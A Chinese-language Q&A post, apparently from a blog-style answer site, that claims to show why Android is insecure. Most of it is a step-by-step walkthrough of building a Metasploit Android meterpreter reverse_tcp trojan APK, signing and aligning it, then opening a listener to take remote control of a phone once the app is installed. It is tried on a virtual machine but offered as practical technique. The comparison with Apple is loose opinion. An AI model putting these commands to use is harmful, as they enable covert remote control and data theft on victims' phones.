為什么有人說安卓系統不安全？

謝邀~~

眾所周知，手機操作系統的兩大巨頭：安卓和蘋果。而安卓由于是開源系統，流暢性和安全性成為使用者口中經常吐槽的話題，流暢性從使用中我們可以得到驗證。那么為什么說安全性也比蘋果系統略勝一籌呢，怎么才能看得出呢？現在小編就帶大家去驗證一下安卓手機的安全性問題。

老規矩，還是利用kali系統下集成的metasploit工具生成一個木馬

1、打開kali，輸入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST= “kali系統的IP”LPORT= “端口可自由設置，但不要設為已經固定的端口號” R > aaa.apk】。由安卓手機的安卓包都是以apk結尾的，所以要生成apk結尾的文件。

如果出現下圖的信息，就表示木馬文件已經生成，可以從根目錄下找到aaa.apk文件。

接著，需要創建木馬文件的證書和數字簽名，由于小編也沒有研究過安卓開發，只是知道安卓軟件安裝的時候需要用到這兩個東西，所以不能為題主和各位讀者解釋了，請見諒。

2、通過【keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999】命令，創建一個證書。

然后進行相關信息的配置，確認證書信息。

3、【jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa】，創建數字簽名。

為了保證木馬能夠在大多數安卓手機安裝運行，需要對木馬文件進行優化

4、先安裝zipalign工具,安裝的命令是【apt-get install zipalign】。

接著就可以對木馬文件進行優化了，命令是【zipalign -v 4 aaa.apk aaaa.apk】，如果出現報錯信息可以忽略。

5、打開安卓系統虛擬機，小編利用QQ把木馬文件傳到了虛擬機，暫時先不安裝。

6、使用【use exploit/multi/handler】加載攻擊模塊，【set payload android/meterpreter/reverse_tcp】選擇使用的payload模塊

然后在安卓虛擬機安裝木馬文件，并運行。

7、返回kali系統，執行攻擊命令【exploit】，就會發現返回木馬已經被執行了，證明已經獲取了安卓虛擬機權限，此時命令行會自動進入meterperter命令，輸了【help】命令可以查看安卓系統的操作指令。至此就完成了入侵安卓系統的基本操作了！

通過這個測試我們可以知道安卓系統由于對APP的審核不嚴格，導致大量非法的APP可以在手機上安裝并運行，造成手機卡頓，中毒等情況。相比之下，蘋果系統的審核力度是非常大的，想要在蘋果手機安裝的APP必須通過嚴格的審查并限制，所以蘋果手機在安全性方面的確比安卓手機更勝一籌。當然這只是小編的一點了解和想法，不能解釋的面面俱到，歡迎讀者在評論區留言，我們一起討論學習！

關注小編，我將定期為大家解答各類網絡安全的疑惑，并且為大家帶來網絡安全的實用技術。大家如果對網絡安全方面的問題也可以向小編提問，如果我知道的都會為大家竭力解答！需要安卓系統虛擬機安裝包的也可以私信小編"安卓虛擬機"，我可以給大家提供。